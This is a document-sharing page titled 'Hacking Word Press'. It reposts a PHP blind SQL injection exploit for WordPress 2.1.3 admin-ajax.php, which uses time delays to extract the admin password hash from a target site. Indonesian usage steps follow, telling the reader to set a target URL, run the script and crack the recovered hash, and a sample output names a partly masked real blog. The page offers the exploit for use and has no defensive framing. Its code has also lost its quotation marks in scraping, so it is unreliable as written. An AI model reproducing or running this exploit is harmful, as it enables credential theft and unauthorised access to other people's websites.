Hacking Word Press

Hacking wordpress
<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 admin-ajax.php sql injection blind fishing exploit
// written by Janek Vind waraxe
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//==================================================
===================
$outfile = ./hacked.txt;// Log file. Ingat kasih CHMOD 777
$url = http://target_loe.xxx/wp-admin/admin-ajax.php;
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value 1 is admins ID
$suffix = ;// Override value, if needed
$prefix = wp_;// WordPress table prefix, default is wp_
//==================================================
====================
echo Target: $url\n;
echo sql table prefix: $prefix\n;
if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}
echo cookie suffix: $suffix\n;
echo testing probe delays \n;
$norm_delay = get_normdelay($testcnt);
echo normal delay: $norm_delay deciseconds\n;
$hash = get_hash();
add_line(Target: $url);
add_line(User ID: $id);
add_line(Hash: $hash);
echo \nWork finished\n;
echo Questions and feedback - http://www.waraxe.us/ \n;

die(See ya! \n);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = user_password;
$out = ;
echo finding hash now \n;
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo got $field pos $i > $ch\n;
$out .= $ch;
echo current value for $field: $out \n;
}
echo \nFinal result: $field=$out\n\n;
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = ;
$cnt = $testcnt * 4;
$ppattern = cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%
%3dp0hh;
$ipattern = UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE
ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,
MD5(1337)),3)/*;
// First lets determine, if its number or letter
$inj = sprintf($ipattern, $prefix, $id, >57);
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);
if($letter)
{
$min = 97;
$max = 102;
echo char to find is [a-f]\n;
}
else
{
$min = 48;
$max = 57;
echo char to find is [0-9]\n;
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, =$max);
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, >$curr);
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
echo curr: $curr$max$min\n;
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;
while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();
if($buff === -1)
{
break;
}
else
{
echo test_condition() - try $try - invalid return value \n;
$try ++;
if($try > $maxtry)
{
die(too many tries - exiting \n);
}
else
{
echo trying again - try $try \n;
}
}
}
$diff = $end - $start;
$delay = intval($diff * 10);
if($delay > ($norm_delay * 2))
{
$bret = true;
}
return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo $fa\n;
$sa = test_md5delay($testcnt);
echo $sa\n;
$fb = test_md5delay(1);
echo $fb\n;
$sb = test_md5delay($testcnt);
echo $sb\n;
$fc = test_md5delay(1);
echo $fc\n;
$sc = test_md5delay($testcnt);
echo $sc\n;
$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo mean nondelayed - $mean_nondelayed dsecs\n;
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo mean delayed - $mean_delayed dsecs\n;
return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;
// delay in deciseconds
$delay = -1;
$ppattern = cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%
%3dp0hh;
$ipattern = UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE
ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*;
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();
if(intval($buff) !== -1)
{
die(test_md5delay($cnt) - invalid return value, exiting );
}
$diff = $end - $start;
$delay = intval($diff * 10);
return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode( , microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields=, $cookie = , $referer = , $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; .NET CLR 2.0.50727));
if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;
$buf .= \n;
$fh = fopen($outfile, ab);
fwrite($fh, $buf);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
?>
Cara pemakaian :
1. Ganti $url ke target anda.
2. buat satu file kosong dengan attrib CHMOD 777 hacked.txt
3. Run it, jika sukses anda akan mendapatkan output seperti ini :
Target: http://blog.r******x.com/wp-admin/admin-ajax.php
User ID: 1
Md5 Hash: 9d150562e37ffeb3d8e4bf1*********
Last thing to do is crack the hash.

Hacking Word Press

Uploaded by

Copyright:

Available Formats

You might also like

Hacking Word Press

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Hacking Word Press

Uploaded by

Copyright:

Available Formats

Hacking wordpress

echo Questions and feedback - http://www.waraxe.us/ \n;

You might also like